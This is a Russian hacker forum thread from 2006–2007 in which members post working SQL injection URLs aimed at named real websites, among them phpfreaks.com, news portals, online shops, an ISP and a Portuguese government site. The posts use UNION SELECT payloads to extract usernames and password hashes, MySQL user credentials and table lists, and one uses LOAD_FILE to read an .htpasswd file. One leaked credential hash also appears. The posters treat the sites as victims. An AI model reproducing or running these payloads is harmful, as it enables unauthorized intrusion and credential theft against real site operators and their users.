SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    phpfreaks.com
    Code:
    http://www.phpfreaks.com/user.php?cmd=view&user_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,concat(username,0x3a,password),27,28,29,30,31,32,33,34,35,36,37,38,39+from+user+limit+0,1/*
    36-37 тысяч юзеров..
    phpfreak:d3d69778807f411f07768dd5ae7f194e:37
     
  2. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    Code:
    http://www.diariodemadryn.com/vernoti.php?ID=63708+union+select+1,2,3,version(),user(),database(),7,8,9,10+limit+1,1/*
    www.mysql-hispano.org
    Code:
    http://www.mysql-hispano.org/page.php?id=43%20UNION%20SELECT%20version(),2+limit+1,1/*
    Code:
    http://sololiteratura.com/php/autor.php?id=-3+union+select+1,database(),version()/*
    Code:
    http://www.agenciapulsar.org/coberturas_det.php?id=-14+union+select+1,2,3,version()/*
     
    #1202 XTErner, 21 Mar 2007
    Last edited: 21 Mar 2007
    1 person likes this.
  3. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    А вот и скуля у падлючих комуняк.

    www.komunist.com.ua

    Code:
    http://www.komunist.com.ua/?news_id=9999+union+select+convert(version(),char)+from+users/*





    p.s.эх спасибо Грею, так бы до бесконечности подбирал еслиб не тайтл =)
     
    #1203 Ksander, 21 Mar 2007
    Last edited: 21 Mar 2007
  4. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Вроде колонка pass только ничего не выводит...

    Code:
    http://bvp.ru/libs/list.php?tid=-1+union+select+1,concat(id,char(58),name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+autors+limit+21,1/*
    Code:
    http://www.ont.by/index.php?id_sport=6&id=-1+union+select+1,2,3,database(),5,6,7,8,9,10,11/*
     
  5. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    Чет мне с колонками не везет сегодня =(
    http://www.job4u.com.ua

    Code:
    http://www.job4u.com.ua/jobList.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26............

    http://www.proformula.ua

    Code:
    http://www.proformula.ua/archive.phtml?id_rubric=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31..........
     
    1 person likes this.
  6. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    kino.ru

    Code:
    http://kino.ru/cinema.php?id=-1+union+select+1,2,3,4,5,6,7/*
     
    1 person likes this.
  7. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    =(

    Code:
    http://www.goverla-tour.com.ua/country.php?countr_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51
     
    2 people like this.
  8. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    www.gov-civil-aveiro.pt
    Code:
    http://www.gov-civil-aveiro.pt/printnoticia.php?id=-212%20UNION%20SELECT%201,user(),3,4,5,6,7,8,9,10/*
     
    2 people like this.
  9. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    http://www.labor.ru/consult.php?id=-1+union+select+1,2,3/*
     
  10. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://www.sotovikm.ru/tovar.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
    сайт без формы, просто так запостил)
    Code:
    http://ccfrussia.ru/index.php?mod=p_article&p_id=-1+union+select+1,2,3,4,5,convert(table_name+using+latin1),7,8,9,10,11,12,13+from+information_schema.tables+limit+62,1/*
    все не смотрел.. думаю, там тож ниче интересного..
    мде.. не клюет че-то (c)
     
    2 people like this.
  11. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    http://www.rusguns.org/article.php?id=-1+union+select+1,2,3,4,5,6,7/*
     
  12. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    Автомагазин On-Line

    http://www.autogazeta.com/car.php?id=-1+union+select+1,table_name+from+information_schema.tables+limit+16,5/*
     
    1 person likes this.
  13. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    http://www.event4you.ru/bands_detail.php?id=-1+union+select+1,2,3,4,5,6/*
     
    1 person likes this.
  14. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://www.acana.ru/acana.php?razdel_id=-1+union+select+1,concat(user,0x3a,password),3,4,5,6+from+mysql.user+limit+0,1/*
    аналогичная ситуация..
     
  15. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    Наконецто более\менее серьезная жертва =)
    lecos.com.ua

    Lecos
    Интерент Сервис Провайдер.
    Code:
    http://lecos.com.ua/new/mod.php?mod=userpage&menu=1002&page_id=-1+union+select+convert(concat(user(),char(58),version(),char(58),database()),char),2/*
     
    #1215 Ksander, 21 Mar 2007
    Last edited: 21 Mar 2007
  16. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    linux

     
  17. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Code:
    http://www.acana.ru/acana.php?razdel_id=-1+union+select+1,LOAD_FILE('/usr/local/apache/htdocs/admin/.htpasswd'),3,4,5,6/*
    
    ^^
    LOAD_FILE, etc...
    =)
     
    2 people like this.
  18. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    http://www.liljas-library.com/section.php?id=21+order+by+11/*
    ЖЕЕЕСТЬ - см щапку... ужос.. (клабонервным не ссать, не такая уж и жесть) :mad:
     
  19. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    Code:
    http://www.rosma.edu.ee/files/index.php?id=-42+union+select+user(),version()/*
     
  20. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://dvdselect.ru/podrobno.php?dvd=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
    табл не подобрал :)
     
    1 person likes this.
Thread Status:
Not open for further replies.